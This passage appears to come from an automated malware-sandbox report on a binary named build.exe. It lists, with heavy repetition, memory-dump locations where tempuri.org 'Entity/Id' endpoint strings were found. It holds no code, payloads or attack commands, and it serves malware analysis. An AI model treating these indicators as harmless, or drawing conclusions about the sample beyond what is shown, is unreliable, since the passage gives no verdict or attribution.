                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponsehD
